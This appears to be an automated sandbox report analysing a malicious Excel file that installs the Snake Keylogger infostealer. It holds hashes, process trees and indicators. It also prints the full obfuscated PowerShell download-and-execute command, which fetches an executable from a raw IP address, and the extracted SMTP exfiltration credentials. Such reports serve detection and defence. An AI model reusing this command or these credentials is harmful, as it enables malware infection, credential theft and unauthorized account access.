Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02-10-2024 01:34
Static task
static1
Behavioral task
behavioral1
Sample
c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls
Resource
win10v2004-20240910-en
General
-
Target
c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls
-
Size
866KB
-
MD5
b74b9f77a4f538ff131c1be7ed01414f
-
SHA1
25dac77c5cf517d87da4e2b936a294b88c73185d
-
SHA256
c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1
-
SHA512
19b80ce89cef0288e95081dab9da47df5afc20a958159cd9ac9f96177fb0e249ee713524f703109b3effaf1f48a28251187fd6b0c2eb59d4be870d0eb53932c7
-
SSDEEP
24576:2VgVPjrLE7wRtMk8gwYRJBeMgBDDb/7zpkH/6:2yjXE7wRKzERJTgBXbm
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2020-64-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2020-65-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2020-66-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2736 mshta.exe 11 2736 mshta.exe 13 2660 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2660 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 316 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2660 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00060000000194fc-56.dat autoit_exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 316 set thread context of 2020 316 taskhostw.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2672 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2660 powershell.exe 2660 powershell.exe 2660 powershell.exe 2020 RegSvcs.exe 2020 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 316 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2660 powershell.exe Token: SeDebugPrivilege 2020 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2672 EXCEL.EXE 2672 EXCEL.EXE 2672 EXCEL.EXE 2672 EXCEL.EXE 2672 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2736 wrote to memory of 2588 2736 mshta.exe 32 PID 2736 wrote to memory of 2588 2736 mshta.exe 32 PID 2736 wrote to memory of 2588 2736 mshta.exe 32 PID 2736 wrote to memory of 2588 2736 mshta.exe 32 PID 2588 wrote to memory of 2660 2588 cmd.exe 34 PID 2588 wrote to memory of 2660 2588 cmd.exe 34 PID 2588 wrote to memory of 2660 2588 cmd.exe 34 PID 2588 wrote to memory of 2660 2588 cmd.exe 34 PID 2660 wrote to memory of 692 2660 powershell.exe 35 PID 2660 wrote to memory of 692 2660 powershell.exe 35 PID 2660 wrote to memory of 692 2660 powershell.exe 35 PID 2660 wrote to memory of 692 2660 powershell.exe 35 PID 692 wrote to memory of 1096 692 csc.exe 36 PID 692 wrote to memory of 1096 692 csc.exe 36 PID 692 wrote to memory of 1096 692 csc.exe 36 PID 692 wrote to memory of 1096 692 csc.exe 36 PID 2660 wrote to memory of 316 2660 powershell.exe 39 PID 2660 wrote to memory of 316 2660 powershell.exe 39 PID 2660 wrote to memory of 316 2660 powershell.exe 39 PID 2660 wrote to memory of 316 2660 powershell.exe 39 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 PID 316 wrote to memory of 2020 316 taskhostw.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2672
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ref_mcni.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0C1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC0C0.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:1096
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2020
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD53539846159a1fc99b3f14f5e5e1393b8
SHA1a021c8dda53a5f3c6889e17fe84c0352b2855bdc
SHA2569c419f7da335d9a35b69f7e5300f61bc6bc7a2ad446b7fe85b87e60c0d41d31a
SHA51200fd91ef44a5c34be1e8d5383587d9c55900b2666232e0f249c3c7b00340983d0ece7786f577f72229f20b30bf7e658a6758b94369222735c7b31c5a1081f8f1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD500c3866ab7170f3a5db77fccb5c3f119
SHA113e6057355aa1da76d9536b5c56a70bae79568be
SHA2560f5857b025a0a33bac0512e86467be41ad90291f5a4209e6018a73127f26c4ee
SHA512cceb4db16207b8960e947e93a0b937101fceef7f45aef7ef5303e5a2f89b79d15d5cd667b51a36ea5f21e6c0cec2c79c08d122abb09a2fc9e7d53f7bd3eb8f2a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\niceworkwitheverybody[1].hta
Filesize8KB
MD546f7566c298cdc31ac0c0f7c7800d02e
SHA17ccaa47baaec50720f0f6cbccfff28947eee0d59
SHA2564ac90b298cf34de897cee2147b6f3feb9236afdaa085f45c8d43dfdbf154a492
SHA51253b97bd148afe1d3eda168418f0abcc75a7213b5339d1f481335d025a1cf7a84205b456e5bf7cf87bfd29bb12baf4c780274e4a7be3b8ba92eaa2e3ad4fea285
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5b54130189d874f1b4547af683d4306ad
SHA160e88557317f93f943effefea96e71e8d174a785
SHA256e264480be0cdce96bec1d0beac87b912afb0031b71049b970f4953536a7d21e9
SHA512b60bb7cdd85321e943c08e2637be14a867eb73a0f09cf585221130d78fb055f05c9aa3621954b6d862e555996e007813bf0b3f78f7f235b218495f50970ef9bc
-
Filesize
3KB
MD51f7bacc0e0861b18d2c9aca7d5d58376
SHA188bd4b451de5685e001f75e2e13c6ca23404f0df
SHA2569a0743510144459cbbc84e402ea0705e6a0ebff6fc46e59b7b70976ac62abcee
SHA512871660acb46ede4e7f915998ba81a6d88c28039ae13215bb1026f0a4b054f38191bf04a64706b190e52cd30f4d7541f47df0a504ee9b62cc7bbc572cb4138327
-
Filesize
7KB
MD51a0d601426b73e123fa9b7a76738a4b5
SHA1a4c1edd3f02b62bd1f8ec4dbc871b329de27146d
SHA256e09bfc47665b668437b07a49e8338cbcd695bbc8a109dae9547b6565d6e7cc16
SHA512121aa4cfe145e1264f3f2e3157ca3b3907b66c17b1f6994c82d22f9c93202c414a5e7ef2f0144a52236a9d522facfb8e4ff9e0b5ae5d3423bd1ed518cfed40ae
-
Filesize
927KB
MD572489275d4647bac97371516cc034a56
SHA1154f42f5b5b2dee0407813f4b86ebc3b75313e89
SHA2562ef8baaa2ea5cbf4bc00e9435c8191b1e57470a021819314692c9a13f26e5e82
SHA51218dd73769d62999c7cd408377ca374b0df71a59703f810ead593ea37c49280c4b1f03b0192371aef4750dba60a25b26e2dcf44024ec13bf520e83740d904fc6c
-
Filesize
652B
MD53435d13f568291c9097e8acd43ad5117
SHA186de87e8de6283b0c76cd42b6bd2f2a36eff2bcf
SHA25633674f508e84d1a3b3530a6f1db79d14b63c9e275b040912683b034514611538
SHA512c55e8493a7972bfd19cfe045ceec9845b3137ee7ef97c5491c8492428c2a6eb81803adf7b51a4fd07e3868422ffb4dcdc428813b39ad1510d2c0b28207701b5f
-
Filesize
463B
MD526586cfd3feae7a8042b855cf878e0b2
SHA1fd8d93697c49047ddbcaaee8475061a4894a3906
SHA2560374876ae0666d1d4296d2d500351e292b0ec565b31aac339abf1c551b2a26bd
SHA512942f19de8f09985f9f39724b270bca2fe2c29b96ff1cf4db9fdb961321b3442b5266aaa437ed3f87c94e60e7c7f6f84b3bee4bd810284800cde7d53cbf6a84c6
-
Filesize
309B
MD5429c9659c58e0a6e86a6dacfb3b91ea4
SHA1ad2a6486f640d5053f3e2bab416a85e5b2f2cee9
SHA2565457f57641747d970b611d40a186e66975251510be23d229b6766d54225dd0a7
SHA512c2581d04525a02d3acaa1ce751ab6165b59688fcfb2678ec5e25c92d961ab762c554e74809710eebfd2930280b927b82f4aa12667e66e785db65a409671d9eda